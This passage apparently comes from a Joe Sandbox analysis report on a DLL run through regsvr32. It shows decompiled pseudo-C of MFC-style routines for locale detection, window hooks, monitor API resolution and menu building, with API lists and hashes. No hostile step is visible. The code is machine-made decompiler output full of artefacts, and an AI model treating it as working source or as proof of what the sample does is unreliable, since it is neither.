                                                                                                            					_t11 = E10012749(__ebx, _t14, _t17,  &_v16);
                                                                                                            				} else {
                                                                                                            					_t11 = _t9 | 0xffffffff;
                                                                                                            				}
                                                                                                            				return E100117AE(_t11, _v8);
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 1001A464
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
                                                                                                            • Instruction ID: 3c73900817429885cf4f72f3856ece86c9a81f663f4ecb35863165dbab89a4dc
                                                                                                            • Opcode Fuzzy Hash: 05a0c33dc4fe3510d994e67f2a9bcf377461d58a3556d082f56ba058f11004d6
                                                                                                            • Instruction Fuzzy Hash: 66E09235A04248ABDB00DBF4D946E8D77F8AB45314F004155E550DB1D0DBB1E6848754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10034959(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v24;
                                                                                                            				void* _v28;
                                                                                                            				void* _v32;
                                                                                                            				int _v36;
                                                                                                            				int _v40;
                                                                                                            				signed short _v44;
                                                                                                            				int _v52;
                                                                                                            				int _v56;
                                                                                                            				int _v60;
                                                                                                            				int _v64;
                                                                                                            				intOrPtr _t42;
                                                                                                            				struct HINSTANCE__* _t43;
                                                                                                            				_Unknown_base(*)()* _t44;
                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                            				void* _t47;
                                                                                                            				signed int _t50;
                                                                                                            				signed short _t65;
                                                                                                            				signed int _t66;
                                                                                                            				int _t70;
                                                                                                            				signed short _t71;
                                                                                                            				signed int _t72;
                                                                                                            				signed short _t78;
                                                                                                            				signed int _t79;
                                                                                                            				char* _t85;
                                                                                                            				int _t87;
                                                                                                            				signed int _t95;
                                                                                                            				signed int _t99;
                                                                                                            				int _t100;
                                                                                                            				int _t101;
                                                                                                            				void* _t105;
                                                                                                            				void* _t109;
                                                                                                            
                                                                                                            				_t42 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t85 = 0;
                                                                                                            				_v8 = _t42;
                                                                                                            				_v28 = 0;
                                                                                                            				_t43 = GetModuleHandleA("kernel32.dll");
                                                                                                            				_v36 = _t43;
                                                                                                            				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
                                                                                                            				if(_t44 == 0) {
                                                                                                            					if(GetVersion() >= 0) {
                                                                                                            						_t46 = GetModuleHandleA("ntdll.dll");
                                                                                                            						if(_t46 == 0) {
                                                                                                            							L13:
                                                                                                            							 *((intOrPtr*)(_t109 + 0xffffffffffffffc4)) = 0x800;
                                                                                                            							_t105 = 1;
                                                                                                            							_t99 = 0;
                                                                                                            							if(1 <= _t85) {
                                                                                                            								L16:
                                                                                                            								_t47 = 0;
                                                                                                            								L17:
                                                                                                            								return E100117AE(_t47, _v8);
                                                                                                            							} else {
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							while(1) {
                                                                                                            								L14:
                                                                                                            								_t47 = E100348C4(_t85, _t88, _t105, _a4,  *((intOrPtr*)(_t109 + _t99 * 4 - 0x3c)));
                                                                                                            								_pop(_t88);
                                                                                                            								if(_t47 != _t85) {
                                                                                                            									goto L17;
                                                                                                            								}
                                                                                                            								_t99 =  &(1[_t99]);
                                                                                                            								if(_t99 < _t105) {
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						_t88 =  &_v28;
                                                                                                            						_v28 = 0;
                                                                                                            						EnumResourceLanguagesA(_t46, 0x10, 1, 0x10034943,  &_v28);
                                                                                                            						if(_v28 == 0) {
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						_t50 = _v28 & 0x0000ffff;
                                                                                                            						_t88 = _t50 & 0x000003ff;
                                                                                                            						_t100 = _t50 & 0x3ff;
                                                                                                            						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t100);
                                                                                                            						_v60 = ConvertDefaultLocale(_t100);
                                                                                                            						_push(2);
                                                                                                            						L12:
                                                                                                            						_pop(0);
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            					_v32 = 0;
                                                                                                            					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
                                                                                                            						_v36 = 0x10;
                                                                                                            						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011D9B(0, GetModuleHandleA, 0,  &_v24, "%x",  &_v44) == 1) {
                                                                                                            							_t65 = _v44;
                                                                                                            							_v28 = _t65;
                                                                                                            							_t66 = _t65 & 0x0000ffff;
                                                                                                            							_t88 = _t66 & 0x000003ff;
                                                                                                            							_t101 = _t66 & 0x3ff;
                                                                                                            							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t101);
                                                                                                            							_t70 = ConvertDefaultLocale(_t101);
                                                                                                            							_push(2);
                                                                                                            							_v60 = _t70;
                                                                                                            							_pop(0);
                                                                                                            						}
                                                                                                            						RegCloseKey(_v32);
                                                                                                            					}
                                                                                                            					goto L13;
                                                                                                            				}
                                                                                                            				_t71 =  *_t44();
                                                                                                            				_v28 = _t71;
                                                                                                            				_t72 = _t71 & 0x0000ffff;
                                                                                                            				_t95 = _t72 & 0x3ff;
                                                                                                            				_v32 = _t95;
                                                                                                            				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t95);
                                                                                                            				_v60 = ConvertDefaultLocale(_v32);
                                                                                                            				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
                                                                                                            				_v28 = _t78;
                                                                                                            				_t79 = _t78 & 0x0000ffff;
                                                                                                            				_t88 = _t79 & 0x000003ff;
                                                                                                            				_t87 = _t79 & 0x3ff;
                                                                                                            				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
                                                                                                            				_v52 = ConvertDefaultLocale(_t87);
                                                                                                            				_push(4);
                                                                                                            				_t85 = 0;
                                                                                                            				goto L12;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                                                            • GetVersion.KERNEL32 ref: 100349FB
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
                                                                                                            • ConvertDefaultLocale.KERNEL32(76EC4DE0), ref: 10034A98
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10034AA3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                            • API String ID: 780041395-483790700
                                                                                                            • Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                                                            • Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
                                                                                                            • Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                                                            • Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v16;
                                                                                                            				char _v17;
                                                                                                            				char _v272;
                                                                                                            				struct _WNDCLASSEXA _v320;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t52;
                                                                                                            				signed int _t56;
                                                                                                            				char _t58;
                                                                                                            				long _t60;
                                                                                                            				int _t71;
                                                                                                            				long _t81;
                                                                                                            				CHAR* _t83;
                                                                                                            				void* _t90;
                                                                                                            				void* _t99;
                                                                                                            				long* _t102;
                                                                                                            				signed int _t104;
                                                                                                            				long _t105;
                                                                                                            				CHAR* _t107;
                                                                                                            				int _t108;
                                                                                                            
                                                                                                            				_t52 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_push(0x100347fd);
                                                                                                            				_v8 = _t52;
                                                                                                            				_t90 = E10037855(0x1004efe8);
                                                                                                            				if(_a4 == 3) {
                                                                                                            					_t104 =  *(_t90 + 0x14);
                                                                                                            					_push(__edi);
                                                                                                            					_t99 =  *_a12;
                                                                                                            					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
                                                                                                            					_a4 = _t56;
                                                                                                            					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
                                                                                                            						if( *0x1004f354 == 0) {
                                                                                                            							L10:
                                                                                                            							if(_t104 == 0) {
                                                                                                            								if( *0x1004ef68 != 0) {
                                                                                                            									L16:
                                                                                                            									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
                                                                                                            										L20:
                                                                                                            										_t58 = GetWindowLongA(_a8, 0xfffffffc);
                                                                                                            										_v16 = _t58;
                                                                                                            										if(_t58 != 0) {
                                                                                                            											_t107 = "AfxOldWndProc423";
                                                                                                            											if(GetPropA(_a8, _t107) == 0) {
                                                                                                            												SetPropA(_a8, _t107, _v16);
                                                                                                            												if(GetPropA(_a8, _t107) == _v16) {
                                                                                                            													GlobalAddAtomA(_t107);
                                                                                                            													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            										goto L24;
                                                                                                            									}
                                                                                                            									goto L24;
                                                                                                            								}
                                                                                                            								_t108 = 0x30;
                                                                                                            								E10011C50( &_v320, 0, _t108);
                                                                                                            								_v320.cbSize = _t108;
                                                                                                            								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
                                                                                                            								 *0x1004ef68 = _t71;
                                                                                                            								if(_t71 == 0) {
                                                                                                            									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									_v17 = 0;
                                                                                                            									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
                                                                                                            										goto L24;
                                                                                                            									}
                                                                                                            									goto L20;
                                                                                                            								}
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							E1002212F(_t104, _a8);
                                                                                                            							 *((intOrPtr*)( *_t104 + 0x50))();
                                                                                                            							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
                                                                                                            							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
                                                                                                            							if(_t81 != E1002292C) {
                                                                                                            								 *_t102 = _t81;
                                                                                                            							}
                                                                                                            							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            						_t83 =  *(_t99 + 0x28);
                                                                                                            						if(_t83 <= 0xffff) {
                                                                                                            							_v16 = 0;
                                                                                                            							GlobalGetAtomNameA(0,  &_v16, 5);
                                                                                                            							_t83 =  &_v16;
                                                                                                            						}
                                                                                                            						if(lstrcmpiA(_t83, "ime") == 0) {
                                                                                                            							goto L24;
                                                                                                            						}
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						L24:
                                                                                                            						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
                                                                                                            						if(_a4 != 0) {
                                                                                                            							UnhookWindowsHookEx( *(_t90 + 0x28));
                                                                                                            							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
                                                                                                            						}
                                                                                                            						_t60 = _t105;
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
                                                                                                            					L27:
                                                                                                            					return E100117AE(_t60, _v8);
                                                                                                            				}
                                                                                                            			}
























                                                                                                            APIs
                                                                                                              • Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A
                                                                                                            • CallNextHookEx.USER32 ref: 10023604
                                                                                                            • GetClassLongA.USER32 ref: 10023649
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 10023675
                                                                                                            • lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
                                                                                                            • SetWindowLongA.USER32 ref: 100236BE
                                                                                                            • CallNextHookEx.USER32 ref: 100237C2
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 100237D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                            • API String ID: 3204395069-4034971020
                                                                                                            • Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                                                            • Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
                                                                                                            • Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                                                            • Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E1000799F() {
                                                                                                            				void* __edi;
                                                                                                            				intOrPtr _t5;
                                                                                                            				_Unknown_base(*)()* _t6;
                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                            				_Unknown_base(*)()* _t8;
                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                            				_Unknown_base(*)()* _t10;
                                                                                                            				_Unknown_base(*)()* _t11;
                                                                                                            				_Unknown_base(*)()* _t12;
                                                                                                            				void* _t17;
                                                                                                            				struct HINSTANCE__* _t18;
                                                                                                            				intOrPtr _t23;
                                                                                                            				_Unknown_base(*)()* _t24;
                                                                                                            
                                                                                                            				_t23 =  *0x1004ee14; // 0x0
                                                                                                            				if(_t23 == 0) {
                                                                                                            					_push(_t17);
                                                                                                            					 *0x1004ee18 = E10007952(_t17);
                                                                                                            					_t18 = GetModuleHandleA("USER32");
                                                                                                            					if(_t18 == 0) {
                                                                                                            						L11:
                                                                                                            						 *0x1004edf8 = 0;
                                                                                                            						 *0x1004edfc = 0;
                                                                                                            						 *0x1004ee00 = 0;
                                                                                                            						 *0x1004ee04 = 0;
                                                                                                            						 *0x1004ee08 = 0;
                                                                                                            						 *0x1004ee0c = 0;
                                                                                                            						 *0x1004ee10 = 0;
                                                                                                            						 *0x1004ee14 = 1;
                                                                                                            						_t5 = 0;
                                                                                                            					} else {
                                                                                                            						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                            						 *0x1004edf8 = _t6;
                                                                                                            						if(_t6 == 0) {
                                                                                                            							goto L11;
                                                                                                            						} else {
                                                                                                            							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                            							 *0x1004edfc = _t7;
                                                                                                            							if(_t7 == 0) {
                                                                                                            								goto L11;
                                                                                                            							} else {
                                                                                                            								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                            								 *0x1004ee00 = _t8;
                                                                                                            								if(_t8 == 0) {
                                                                                                            									goto L11;
                                                                                                            								} else {
                                                                                                            									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                            									 *0x1004ee04 = _t9;
                                                                                                            									if(_t9 == 0) {
                                                                                                            										goto L11;
                                                                                                            									} else {
                                                                                                            										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                            										 *0x1004ee0c = _t10;
                                                                                                            										if(_t10 == 0) {
                                                                                                            											goto L11;
                                                                                                            										} else {
                                                                                                            											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                            											 *0x1004ee08 = _t11;
                                                                                                            											if(_t11 == 0) {
                                                                                                            												goto L11;
                                                                                                            											} else {
                                                                                                            												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                            												 *0x1004ee10 = _t12;
                                                                                                            												if(_t12 == 0) {
                                                                                                            													goto L11;
                                                                                                            												} else {
                                                                                                            													_t5 = 1;
                                                                                                            													 *0x1004ee14 = 1;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t5;
                                                                                                            				} else {
                                                                                                            					_t24 =  *0x1004ee08; // 0x0
                                                                                                            					return 0 | _t24 != 0x00000000;
                                                                                                            				}
                                                                                                            			}

















                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                            • API String ID: 667068680-68207542
                                                                                                            • Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                                                            • Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
                                                                                                            • Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                                                            • Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				char _v32;
                                                                                                            				char _v268;
                                                                                                            				char _v292;
                                                                                                            				char _v296;
                                                                                                            				signed int _v300;
                                                                                                            				CHAR* _v304;
                                                                                                            				intOrPtr _v308;
                                                                                                            				char _v312;
                                                                                                            				char _v316;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t102;
                                                                                                            				intOrPtr _t106;
                                                                                                            				signed int _t108;
                                                                                                            				signed int _t110;
                                                                                                            				int* _t118;
                                                                                                            				signed int _t125;
                                                                                                            				signed int _t128;
                                                                                                            				signed int _t132;
                                                                                                            				void* _t136;
                                                                                                            				intOrPtr* _t138;
                                                                                                            				void* _t170;
                                                                                                            				intOrPtr* _t171;
                                                                                                            				void* _t173;
                                                                                                            				int _t175;
                                                                                                            				intOrPtr _t176;
                                                                                                            				signed int _t177;
                                                                                                            				intOrPtr _t180;
                                                                                                            				intOrPtr* _t181;
                                                                                                            				signed int _t182;
                                                                                                            				intOrPtr _t183;
                                                                                                            				signed char _t196;
                                                                                                            				signed char _t197;
                                                                                                            				signed int _t217;
                                                                                                            				intOrPtr* _t219;
                                                                                                            				intOrPtr* _t220;
                                                                                                            				void* _t223;
                                                                                                            				intOrPtr* _t224;
                                                                                                            				signed int _t226;
                                                                                                            				void* _t228;
                                                                                                            				void* _t229;
                                                                                                            				void* _t230;
                                                                                                            
                                                                                                            				_t223 = __esi;
                                                                                                            				_t181 = __ecx;
                                                                                                            				_t170 = __ebx;
                                                                                                            				_t102 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_push(__esi);
                                                                                                            				_push(__edi);
                                                                                                            				_v8 = _t102;
                                                                                                            				_t219 = __ecx;
                                                                                                            				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
                                                                                                            					L10:
                                                                                                            					_push(0);
                                                                                                            					_push(0xffffffff);
                                                                                                            					_push(3);
                                                                                                            					E10027180(_t181);
                                                                                                            					asm("int3");
                                                                                                            					E10011BF0(0x1003ab29, _t228);
                                                                                                            					_t230 = _t229 - 0x12c;
                                                                                                            					_t106 =  *0x1004c470; // 0xf3933a06
                                                                                                            					_push(_t170);
                                                                                                            					_push(_t223);
                                                                                                            					_t224 = _a4;
                                                                                                            					_push(_t219);
                                                                                                            					_t220 = _t181;
                                                                                                            					_t182 =  *(_t224 + 0xc);
                                                                                                            					_v20 = _t106;
                                                                                                            					_t171 = _t220 + 0x1c;
                                                                                                            					_t108 =  *( *_t171 - 0xc);
                                                                                                            					__eflags = _t108;
                                                                                                            					if(_t108 == 0) {
                                                                                                            						__eflags = _t182;
                                                                                                            						if(_t182 != 0) {
                                                                                                            							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
                                                                                                            					_t110 = 0;
                                                                                                            					__eflags =  *(_t183 - 0xc);
                                                                                                            					if( *(_t183 - 0xc) != 0) {
                                                                                                            						__eflags =  *(_t224 + 0xc);
                                                                                                            						if( *(_t224 + 0xc) != 0) {
                                                                                                            							_t173 = 0;
                                                                                                            							__eflags =  *(_t220 + 4);
                                                                                                            							if( *(_t220 + 4) > 0) {
                                                                                                            								do {
                                                                                                            									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
                                                                                                            									_t173 = _t173 + 1;
                                                                                                            									__eflags = _t173 -  *(_t220 + 4);
                                                                                                            								} while (_t173 <  *(_t220 + 4));
                                                                                                            							}
                                                                                                            							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
                                                                                                            							__eflags = _t110;
                                                                                                            							if(_t110 != 0) {
                                                                                                            								__eflags = _t110 - 0x104;
                                                                                                            								if(_t110 < 0x104) {
                                                                                                            									_t175 = lstrlenA( &_v292);
                                                                                                            									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
                                                                                                            									_t176 = _t175 + 1;
                                                                                                            									_v308 = _t176;
                                                                                                            									 *((char*)(_t228 + _t176 - 0x120)) = 0;
                                                                                                            									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
                                                                                                            									_v8 = _v8 & 0x00000000;
                                                                                                            									_t118 = E100243B2();
                                                                                                            									_t216 =  *_t118;
                                                                                                            									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
                                                                                                            									_a4 = _a4 & 0x00000000;
                                                                                                            									__eflags =  *(_t220 + 4);
                                                                                                            									_v8 = 1;
                                                                                                            									if( *(_t220 + 4) > 0) {
                                                                                                            										while(1) {
                                                                                                            											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
                                                                                                            											__eflags = _t125;
                                                                                                            											if(_t125 == 0) {
                                                                                                            												goto L40;
                                                                                                            											}
                                                                                                            											_t177 = _v300;
                                                                                                            											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
                                                                                                            											while(1) {
                                                                                                            												_t196 =  *_t177;
                                                                                                            												__eflags = _t196;
                                                                                                            												if(_t196 == 0) {
                                                                                                            													break;
                                                                                                            												}
                                                                                                            												__eflags = _t196 - 0x26;
                                                                                                            												if(_t196 == 0x26) {
                                                                                                            													 *_t128 = _t196;
                                                                                                            													_t128 = _t128 + 1;
                                                                                                            													__eflags = _t128;
                                                                                                            												}
                                                                                                            												_t197 =  *_t177;
                                                                                                            												_t217 = _t197 & 0x000000ff;
                                                                                                            												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
                                                                                                            												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
                                                                                                            													 *_t128 = _t197;
                                                                                                            													_t128 = _t128 + 1;
                                                                                                            													_t177 = _t177 + 1;
                                                                                                            													__eflags = _t177;
                                                                                                            												}
                                                                                                            												 *_t128 =  *_t177;
                                                                                                            												_t128 = _t128 + 1;
                                                                                                            												_t177 = _t177 + 1;
                                                                                                            												__eflags = _t177;
                                                                                                            											}
                                                                                                            											 *_t128 = _t196;
                                                                                                            											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
                                                                                                            											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
                                                                                                            											__eflags = _t132 - 0xa;
                                                                                                            											if(__eflags <= 0) {
                                                                                                            												if(__eflags != 0) {
                                                                                                            													wsprintfA( &_v32, ??, "&%d ", _t132);
                                                                                                            													goto L38;
                                                                                                            												} else {
                                                                                                            													lstrcpyA( &_v32, "1&0 ");
                                                                                                            												}
                                                                                                            											} else {
